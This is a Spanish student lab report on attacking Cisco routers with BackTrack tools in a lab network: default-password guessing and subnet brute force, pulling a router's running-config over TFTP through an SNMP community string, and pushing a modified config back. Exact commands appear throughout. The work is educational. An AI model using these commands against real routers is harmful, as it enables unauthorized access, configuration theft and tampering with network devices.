Está en la página 1de 27

Santiago Sur

Ingeniera en Telecomunicaciones,
Conectividad y Redes
Seguridad en Redes

ATAQUES CON BACKTRACK
Nombre Alumno (s): Elias Cossio
Jorge Quezada
Nombre Profesor: Rene Guerrero
Fecha: 12 de noviembre de 2013




Cisco Auditing Tool

La topologa que utilizaremos ser la siguiente.

Cisco Auditing Tool (CAT) es una mini herramienta de auditora de seguridad. Analiza
las vulnerabilidades ms comunes de los routers Cisco, como las contraseas por
defecto, las cadenas de comunidad SNMP y algunos de los antiguos errores del IOS.
Incluye tambien soporte para dems plugins y el escaneo de mltiples hosts.

Tras una previa configuracin de un router por defecto de sus contraseas lo que
aremos ser descubrir la clave de acceso y asi poder cambiar el router a nuestro gusto.
















Ahora vemos la ip de nuestro backtrack y probamos conectividad


















En BackTrack para iniciar la herramienta Cisco Auditing Tool nos vamos al
men Aplications - BackTrack - Vulnerability Assessment - Network Assessment - Cisco
Tools. Una vez que la ventana de la consola se haya cargado correctamente,
podremos mirar todas las opciones posibles que podemos utilizar en contra del nuestro
objetivo.












































Backtrack trae unas contraseas por defecto configuradas, pero para darle ms
posibilidades de encontrar la contrasea se puede editar un archivo e indicarle claves
para buscar.
Primero sacaremos la contrasea con las configuradas por defecto.
Utilizamos la siguiente opcin:
./CAT h 192.168.1.1




































Nos arroja como resultado que la contrasea arrojada fue cisco esta clave la
probaremos despus haciendo un telnet desde aqu.
Ahora editaremos el archivo.










Con el comando:
Nano /pentest/cisco/cisco-auditing-tool/lists/passwords


Una vez editado el archivo guardamos y utilizamos la siguiente secuencia para
descubrir la contrasea:
./CAT -h 192.168.1.1 -a lists/passwords














Nos arroja la misma contrasea anterior cisco ahora vamos a probar si es la correcta
realizando un telnet.






























Cisco Passwd Scanner
La topologa que utilizaremos para realizar las pruebas ser la siguiente

















Cisco passwd scanner es una herramienta incluida en el grupo de vulnerabilidades
Cisco. Su funcin principal es buscar en un rango de IP que an no han sido
configurados correctamente y que por ende, tenga activada la contrasea por
defecto en el equipo.
Comenzamos abriendo la herramienta.
















Nos aparecer un terminal como el siguiente


La herramienta realizara un scanner sobre toda la red que se le indique verificando
cuales routers existentes dentro de la red tienen activada la contrasea por defecto
cisco. El scanneo se realiza a travs de un ataque de fuerza bruta de un solo intento,
probando la palabra de cisco en cada uno de los routers encontrados. Si la conexin
con la contrasea cisco es exitosa, la direccin del router ser listada en los
resultados del comando.









El comando que utilizaremos ser el siguiente
./ciscos 192.168.1 3 t 10















Los resultados son escritos en un archivo de texto llamado cisco.txt que se ubica en la
carpeta /pentest/cisco/ciscos.
















Ahora probaremos los resultados realizando telnet a esas direcciones




















Copy Router Config

Consiste en tomar la configuracin (Running-config) de un router, y llevarla como un
archivo, mediante tftp, hasta la mquina con la cual se est haciendo el ataque.

La imagen muestra la topologa utilizada, donde la Nube representa la mquina
desde donde se realizaron los ataques.
Nota: Para realizar este ataque, se necesita tener configurado un servidor tftp, en este
caso, en el equipo BACKTRACK.



La captura anterior muestra el men donde se encuentra la aplicacin para realizar el
ataque: copy-router-config.

En la captura anterior, se resalta, mediante un cuadro amarillo la lnea de comando
para hacer efectivo el ataque: perl copy-router-config.pl 192.168.1.20 [IP ROUTER]
192.167.1.10 [IP BACKTRACK] private [Relacionado con las comunidades snmp
configuradas en el router]
Luego de procesar el ataque, el sistema enva un OK, indicando que fue realizado con
xito.



En la captura anterior se ingresa al directorio que contiene los archivos que se han
transferido mediante el protocolo TFTP. En este caso, el archivo de configuracin del
Router atacado ha enviado el archivo pwnd-router.config.





Finalmente, al ingresar al archivo, se puede apreciar la configuracin del router. En los
cuadros de color amarillo se destaca el hostname y la configuracin de la interfaz f 0/0
que se configur para realizar el laboratorio. As se comprueba que, efectivamente, el
ataque ha sido realizado con xito.





Merge Router Config

Es la operacin inversa al ataque anterior (Copy Router Config), y por lo general se
trabaja con mbos. Consiste en modificar el archivo de configuracin que el router le
entrega a BackTrack para luego volver a inyectarlo al mismo router, con una nueva
configuracin.
Se utiliz la misma topologa que en el ataque Copy Router Config.









Se han modificado algunos parmetros, por ejemplo, el hostname pasar de R1 a
ROUTER_ATACADO; las interfaces tendrn ahora descripciones y finalmente se ha
configurado una de las lneas vty con un password, adems de un mensaje banner.



La marca amarilla indica la aplicacin que se utilizar para el ataque: merge config
router



La lnea de comando es la siguiente: perl merge-router-config.pl 192.168.1.20 [IP
ROUTER] 192.168.1.10 [IP BACKTRACK] private [Relacionado con las comunidades snmp
configuradas en el router].
Luego, el correspondiente OK para confirmar que el ataque ha sido realizado con
xito.



Inmediatamente, en la consola del router aparece un mensaje indicando que se ha
cargado una configuracin nueva a travs de la ip 192.168.1.10 (BACKTRACK) va tftp.



Finalmente, se procede a revisar la configuracin del router, y efectivamente, los
cambios realizados en el archivo se han cargado con xito. Se aprecia el cambio de la
lnea vty 0, la descripcin de la interfaz, el banner motd.

También podría gustarte